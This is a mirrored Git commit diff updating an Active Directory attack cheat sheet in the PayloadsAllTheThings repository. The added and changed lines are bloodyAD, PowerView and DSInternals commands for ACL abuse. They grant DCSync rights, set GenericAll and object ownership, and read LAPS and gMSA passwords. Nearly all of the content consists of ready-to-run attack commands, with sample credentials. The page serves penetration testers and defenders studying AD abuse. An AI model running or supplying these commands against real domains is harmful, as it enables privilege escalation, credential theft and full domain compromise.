mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 21:35:27 +00:00
Merge pull request #536 from CravateRouge/patch-1
Update bloodyAD attacks
This commit is contained in:
commit
3e8ef29223
@ -2856,10 +2856,10 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
|
|||||||
* On Linux:
|
* On Linux:
|
||||||
```bash
|
```bash
|
||||||
# Give DCSync right to the principal identity
|
# Give DCSync right to the principal identity
|
||||||
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B addDomainSync user2
|
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2
|
||||||
|
|
||||||
# Remove right after DCSync
|
# Remove right after DCSync
|
||||||
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B delDomainSync user2
|
bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False
|
||||||
```
|
```
|
||||||
|
|
||||||
* WriteDACL on Group
|
* WriteDACL on Group
|
||||||
@ -2867,6 +2867,13 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
|
|||||||
Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1
|
Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1
|
||||||
net group "INTERESTING_GROUP" User1 /add /domain
|
net group "INTERESTING_GROUP" User1 /add /domain
|
||||||
```
|
```
|
||||||
|
Or
|
||||||
|
```powershell
|
||||||
|
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp
|
||||||
|
|
||||||
|
# Remove right
|
||||||
|
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False
|
||||||
|
```
|
||||||
|
|
||||||
#### WriteOwner
|
#### WriteOwner
|
||||||
|
|
||||||
@ -2875,6 +2882,10 @@ An attacker can update the owner of the target object. Once the object owner has
|
|||||||
```powershell
|
```powershell
|
||||||
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'
|
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'
|
||||||
```
|
```
|
||||||
|
Or
|
||||||
|
```powershell
|
||||||
|
bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object
|
||||||
|
```
|
||||||
|
|
||||||
This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.
|
This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.
|
||||||
|
|
||||||
@ -2886,6 +2897,10 @@ An attacker can read the LAPS password of the computer account this ACE applies
|
|||||||
```powershell
|
```powershell
|
||||||
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
|
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
|
||||||
```
|
```
|
||||||
|
Or for a given computer
|
||||||
|
```powershell
|
||||||
|
bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
#### ReadGMSAPassword
|
#### ReadGMSAPassword
|
||||||
@ -2900,6 +2915,10 @@ $mp = $gmsa.'msDS-ManagedPassword'
|
|||||||
# Decode the data structure using the DSInternals module
|
# Decode the data structure using the DSInternals module
|
||||||
ConvertFrom-ADManagedPasswordBlob $mp
|
ConvertFrom-ADManagedPasswordBlob $mp
|
||||||
```
|
```
|
||||||
|
Or
|
||||||
|
```powershell
|
||||||
|
python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword
|
||||||
|
```
|
||||||
|
|
||||||
#### ForceChangePassword
|
#### ForceChangePassword
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user